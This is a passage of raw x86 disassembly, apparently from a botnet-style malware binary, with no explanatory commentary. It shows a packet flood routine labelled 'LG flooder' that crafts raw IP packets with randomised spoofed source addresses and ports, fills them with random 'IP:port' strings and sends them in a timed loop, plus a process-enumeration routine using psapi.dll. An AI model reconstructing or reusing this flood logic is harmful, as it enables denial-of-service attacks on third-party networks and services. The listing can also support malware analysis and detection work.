mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0Fh
or al, 40h
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov byte ptr [eax+9], 11h
mov eax, [ebp+var_133C]
mov ecx, [ebp+var_C]
mov [eax+10h], ecx
mov eax, [ebp+var_133C]
mov cx, [ebp+var_E]
mov [eax+16h], cx
and [ebp+var_1338], 0
jmp short loc_4057B6
; ---------------------------------------------------------------------------
loc_4057A9: ; CODE XREF: sub_4055E5:loc_405E22�j
mov eax, [ebp+var_1338]
inc eax
mov [ebp+var_1338], eax
loc_4057B6: ; CODE XREF: sub_4055E5+1C2�j
mov eax, [ebp+var_1338]
cmp eax, [ebp+var_1087]
jge loc_405E27
mov eax, [ebp+var_107F]
mov [ebp+var_1358], eax
cmp [ebp+var_1358], 1
jz short loc_4057FC
cmp [ebp+var_1358], 2
jz loc_405924
cmp [ebp+var_1358], 3
jz loc_405A11
jmp loc_405C71
; ---------------------------------------------------------------------------
loc_4057FC: ; CODE XREF: sub_4055E5+1F6�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_40581E: ; CODE XREF: sub_4055E5+2BF�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4058A9
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_40581E
; ---------------------------------------------------------------------------
loc_4058A9: ; CODE XREF: sub_4055E5+247�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405924: ; CODE XREF: sub_4055E5+1FF�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405946: ; CODE XREF: sub_4055E5+3CB�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4059B2
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405946
; ---------------------------------------------------------------------------
loc_4059B2: ; CODE XREF: sub_4055E5+36F�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405A11: ; CODE XREF: sub_4055E5+20C�j
push 2
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_134C], eax
cmp [ebp+var_134C], 0
jnz short loc_405A52
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405A52: ; CODE XREF: sub_4055E5+444�j
cmp [ebp+var_134C], 1
jnz loc_405B87
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405A81: ; CODE XREF: sub_4055E5+522�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405B0C
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405A81
; ---------------------------------------------------------------------------
loc_405B0C: ; CODE XREF: sub_4055E5+4AA�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405B87: ; CODE XREF: sub_4055E5+474�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405BA9: ; CODE XREF: sub_4055E5+62E�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405C15
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405BA9
; ---------------------------------------------------------------------------
loc_405C15: ; CODE XREF: sub_4055E5+5D2�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
loc_405C6F: ; CODE XREF: sub_4055E5+468�j
; sub_4055E5+59D�j
jmp short loc_405C93
; ---------------------------------------------------------------------------
loc_405C71: ; CODE XREF: sub_4055E5+212�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405C93: ; CODE XREF: sub_4055E5+33A�j
; sub_4055E5+427�j ...
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_1354], eax
and [ebp+var_1350], 0
jmp short loc_405CB8
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_4055E5+6F9�j
mov eax, [ebp+var_1350]
inc eax
mov [ebp+var_1350], eax
loc_405CB8: ; CODE XREF: sub_4055E5+6C4�j
mov eax, [ebp+var_1350]
cmp eax, [ebp+var_1354]
jnb short loc_405CE0
mov eax, [ebp+var_14]
add eax, [ebp+var_1350]
mov al, [eax]
shl al, 1
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1350]
mov [ecx], al
jmp short loc_405CAB
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: sub_4055E5+6DF�j
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+2], ax
call sub_41043F
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+4], ax
call sub_410483
neg eax
sbb eax, eax
and al, 0C0h
add eax, 80h
mov ecx, [ebp+var_133C]
mov [ecx+8], al
push 2
push offset dword_41EF48
call dword_417244 ; inet_addr
push eax
call sub_4040E8
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ch], eax
mov eax, [ebp+var_1354]
add eax, 14h
push eax
push [ebp+var_133C]
call sub_40407D
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ah], ax
movzx eax, [ebp+var_E]
test eax, eax
jnz short loc_405D7F
call sub_41043F
mov ecx, [ebp+var_133C]
mov [ecx+16h], ax
loc_405D7F: ; CODE XREF: sub_4055E5+789�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+14h], ax
mov eax, [ebp+var_1354]
add eax, 8
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+18h], ax
push 10h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
lea eax, [ebp+var_1074]
push eax
push [ebp+var_1078]
call dword_417250 ; sendto
mov [ebp+var_1348], eax
cmp [ebp+var_1348], 0FFFFFFFFh
jnz short loc_405E08
push [ebp+var_1334]
call sub_409763
pop ecx
push [ebp+var_1078]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_405E41
; ---------------------------------------------------------------------------
loc_405E08: ; CODE XREF: sub_4055E5+805�j
push [ebp+var_1083]
call dword_41709C ; Sleep
mov eax, [ebp+var_1334]
cmp dword ptr [eax+4], 0
jz short loc_405E22
jmp short loc_405E27
; ---------------------------------------------------------------------------
loc_405E22: ; CODE XREF: sub_4055E5+839�j
jmp loc_4057A9
; ---------------------------------------------------------------------------
loc_405E27: ; CODE XREF: sub_4055E5+1DD�j
; sub_4055E5+83B�j
push [ebp+var_1078]
call sub_4053B1
pop ecx
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
locret_405E41: ; CODE XREF: sub_4055E5+59�j
; sub_4055E5+94�j ...
leave
retn 4
sub_4055E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E45 proc near ; CODE XREF: sub_40A9CF+8B2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_405E5D
cmp [ebp+arg_8], 0
jz short loc_405E5D
cmp [ebp+arg_14], 0
jnz short loc_405E62
loc_405E5D: ; CODE XREF: sub_405E45+A�j
; sub_405E45+10�j
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E62: ; CODE XREF: sub_405E45+16�j
push 2B9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405E7B
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E7B: ; CODE XREF: sub_405E45+2F�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A7h
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 2A7h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2ADh], eax
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B1h], eax
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B5h], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 0EA60h
jge short loc_405F0E
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_8], eax
jmp short loc_405F15
; ---------------------------------------------------------------------------
loc_405F0E: ; CODE XREF: sub_405E45+B9�j
mov [ebp+var_8], 0EA60h
loc_405F15: ; CODE XREF: sub_405E45+C7�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+2B1h], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 64h
jle short loc_405F3B
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_C], eax
jmp short loc_405F42
; ---------------------------------------------------------------------------
loc_405F3B: ; CODE XREF: sub_405E45+E6�j
mov [ebp+var_C], 64h
loc_405F42: ; CODE XREF: sub_405E45+F4�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+2B1h], ecx
push offset aLgFlooder ; "LG flooder"
push 0
push [ebp+var_4]
push offset sub_4055E5
call sub_4095A4
add esp, 10h
locret_405F65: ; CODE XREF: sub_405E45:loc_405E5D�j
; sub_405E45+31�j
leave
retn
sub_405E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F67 proc near ; CODE XREF: sub_4017AA+6E�p
; sub_401D6E+77�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_405F8E
push 1A3h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_0]
mov byte ptr [eax+198h], 1
jmp short loc_405FA1
; ---------------------------------------------------------------------------
loc_405F8E: ; CODE XREF: sub_405F67+7�j
push 1A3h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
loc_405FA1: ; CODE XREF: sub_405F67+25�j
pop ebp
retn
sub_405F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FA3 proc near ; CODE XREF: sub_4167F1+D0�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push offset dword_41E2B0
call sub_409C36
pop ecx
push offset aPsapi_dll ; "psapi.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405FC8
jmp short locret_40603F
; ---------------------------------------------------------------------------
loc_405FC8: ; CODE XREF: sub_405FA3+21�j
push offset aEnumprocesses ; "EnumProcesses"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E2AC, eax
push offset aEnumprocessmod ; "EnumProcessModules"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E2A0, eax
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E2A4, eax
push offset aGetmoduleinfor ; "GetModuleInformation"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E2A8, eax
cmp dword_41E2AC, 0
jz short locret_40603F
cmp dword_41E2A0, 0
jz short locret_40603F
cmp dword_41E2A4, 0
jz short locret_40603F
cmp dword_41E2A8, 0
jz short locret_40603F
mov byte_41E2CC, 1
locret_40603F: ; CODE XREF: sub_405FA3+23�j
; sub_405FA3+78�j ...
leave
retn
sub_405FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406041 proc near ; CODE XREF: sub_401244:loc_40129D�p
; sub_40637C+29�p
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_12B = byte ptr -12Bh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset dword_41E2B0
call sub_409C6C
pop ecx
movzx eax, byte_41E2CC
test eax, eax
jnz short loc_406074
push offset dword_41E2B0
call sub_409C7A
pop ecx
xor eax, eax
jmp loc_40636A
; ---------------------------------------------------------------------------
loc_406074: ; CODE XREF: sub_406041+1F�j
and [ebp+var_C], 0
and [ebp+var_4], 0
and [ebp+var_1C], 0
push [ebp+var_1C]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_406097
jmp loc_406368
; ---------------------------------------------------------------------------
loc_406097: ; CODE XREF: sub_406041+4F�j
; sub_406041:loc_4060E9�j
mov eax, [ebp+var_1C]
add eax, 80h
mov [ebp+var_1C], eax
push [ebp+var_1C]
push [ebp+var_14]
call sub_416BF6 ; realloc
pop ecx
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4060BD
jmp loc_406366
; ---------------------------------------------------------------------------
loc_4060BD: ; CODE XREF: sub_406041+75�j
lea eax, [ebp+var_4]
push eax
push [ebp+var_1C]
push [ebp+var_14]
call dword_41E2AC
test eax, eax
jnz short loc_4060DF
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406364
; ---------------------------------------------------------------------------
loc_4060DF: ; CODE XREF: sub_406041+8E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
jnb short loc_4060E9
jmp short loc_4060EB
; ---------------------------------------------------------------------------
loc_4060E9: ; CODE XREF: sub_406041+A4�j
jmp short loc_406097
; ---------------------------------------------------------------------------
loc_4060EB: ; CODE XREF: sub_406041+A6�j
mov eax, [ebp+var_4]
shr eax, 2
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
imul eax, 114h
add eax, 8
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40611E
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406362
; ---------------------------------------------------------------------------
loc_40611E: ; CODE XREF: sub_406041+CD�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov eax, [ebp+var_C]
add eax, 8
mov ecx, [ebp+var_C]
mov [ecx+4], eax
and [ebp+var_10], 0
jmp short loc_40613F
; ---------------------------------------------------------------------------
loc_406138: ; CODE XREF: sub_406041+156�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_40613F: ; CODE XREF: sub_406041+F5�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb short loc_406199
push 114h
push 0
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_10]
mov esi, [ebp+var_14]
mov edx, [esi+edx*4]
mov [ecx+eax], edx
push offset aSystem ; "system"
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_406138
; ---------------------------------------------------------------------------
loc_406199: ; CODE XREF: sub_406041+104�j
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
and [ebp+var_10], 0
jmp short loc_4061AF
; ---------------------------------------------------------------------------
loc_4061A8: ; CODE XREF: sub_406041+1A8�j
; sub_406041+1D8�j ...
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4061AF: ; CODE XREF: sub_406041+165�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb loc_406343
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
push 410h
call dword_417094 ; OpenProcess
mov [ebp+var_130], eax
cmp [ebp+var_130], 0
jnz short loc_4061EB
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_4061EB: ; CODE XREF: sub_406041+1A6�j
and [ebp+var_20], 0
and [ebp+var_28], 0
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_28]
push eax
push [ebp+var_130]
call dword_41E2A0
test eax, eax
jnz short loc_40621B
push [ebp+var_130]
call dword_4170A4 ; CloseHandle
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_40621B: ; CODE XREF: sub_406041+1CA�j
push 0Ch
lea eax, [ebp+var_13C]
push eax
push [ebp+var_28]
push [ebp+var_130]
call dword_41E2A8
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_13C]
mov [ecx+eax+4], edx
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_138]
mov [ecx+eax+8], edx
mov al, byte_41DE30
mov [ebp+var_12C], al
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_12B]
rep stosd
stosw
stosb
push 104h
lea eax, [ebp+var_12C]
push eax
push [ebp+var_13C]
push [ebp+var_130]
call dword_41E2A4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_406332
movsx eax, [ebp+var_12C]
test eax, eax
jz short loc_406332
push 104h
lea eax, [ebp+var_12C]
push eax
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_12C]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_18], eax
jmp short loc_4062F7
; ---------------------------------------------------------------------------
loc_4062F0: ; CODE XREF: sub_406041:loc_406330�j
mov eax, [ebp+var_18]
dec eax
mov [ebp+var_18], eax
loc_4062F7: ; CODE XREF: sub_406041+2AD�j
cmp [ebp+var_18], 0
jz short loc_406332
cmp [ebp+var_18], 1
ja short loc_406305
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406305: ; CODE XREF: sub_406041+2C0�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [ebp+eax+var_130+3]
cmp eax, 5Ch
jnz short loc_406330
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_18]
mov [ecx+eax+110h], edx
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_406041+2D2�j
jmp short loc_4062F0
; ---------------------------------------------------------------------------
loc_406332: ; CODE XREF: sub_406041+264�j
; sub_406041+273�j ...
push [ebp+var_130]
call dword_4170A4 ; CloseHandle
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406343: ; CODE XREF: sub_406041+174�j
push offset dword_41E2B0
call sub_409C7A
pop ecx
mov eax, [ebp+var_C]
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406353: ; CODE XREF: sub_406041:loc_406362�j
; sub_406041:loc_406364�j ...
push offset dword_41E2B0
call sub_409C7A
pop ecx
xor eax, eax
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406362: ; CODE XREF: sub_406041+D8�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406364: ; CODE XREF: sub_406041+99�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406366: ; CODE XREF: sub_406041+77�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406368: ; CODE XREF: sub_406041+51�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_40636A: ; CODE XREF: sub_406041+2E�j
; sub_406041+310�j ...
pop edi
pop esi
leave
retn
sub_406041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40636E proc near ; CODE XREF: sub_401244+4D2�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_40636E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40637C proc near ; DATA XREF: sub_4064BF+3B�o
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_406041
mov [ebp+var_1AC], eax
cmp [ebp+var_1AC], 0
jz loc_4064AD
mov eax, [ebp+var_1AC]
push dword ptr [eax]
mov eax, [ebp+var_1A8]
push dword ptr [eax]
push offset dword_418B1C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1B0], 0
jmp short loc_4063F7
; ---------------------------------------------------------------------------
loc_4063EA: ; CODE XREF: sub_40637C:loc_40649C�j
mov eax, [ebp+var_1B0]
inc eax
mov [ebp+var_1B0], eax
loc_4063F7: ; CODE XREF: sub_40637C+6C�j
mov eax, [ebp+var_1AC]
mov ecx, [ebp+var_1B0]
cmp ecx, [eax]
jge loc_4064A1
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+8]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+4]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push offset dword_418B04
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
mov eax, [ebp+var_1A8]
cmp dword ptr [eax+4], 0
jz short loc_40649C
jmp short loc_4064A1
; ---------------------------------------------------------------------------
loc_40649C: ; CODE XREF: sub_40637C+11C�j
jmp loc_4063EA
; ---------------------------------------------------------------------------
loc_4064A1: ; CODE XREF: sub_40637C+89�j
; sub_40637C+11E�j
push [ebp+var_1AC]
call sub_416B4C ; free
pop ecx
loc_4064AD: ; CODE XREF: sub_40637C+3B�j
push [ebp+var_1A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40637C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064BF proc near ; CODE XREF: sub_40A9CF+3FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4064D9
jmp short locret_406507
; ---------------------------------------------------------------------------
loc_4064D9: ; CODE XREF: sub_4064BF+16�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset dword_418B44
push 0
push [ebp+var_4]
push offset sub_40637C
call sub_4095A4
add esp, 10h
locret_406507: ; CODE XREF: sub_4064BF+18�j
leave
retn
sub_4064BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406509 proc near ; CODE XREF: sub_40A9CF+9C9�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
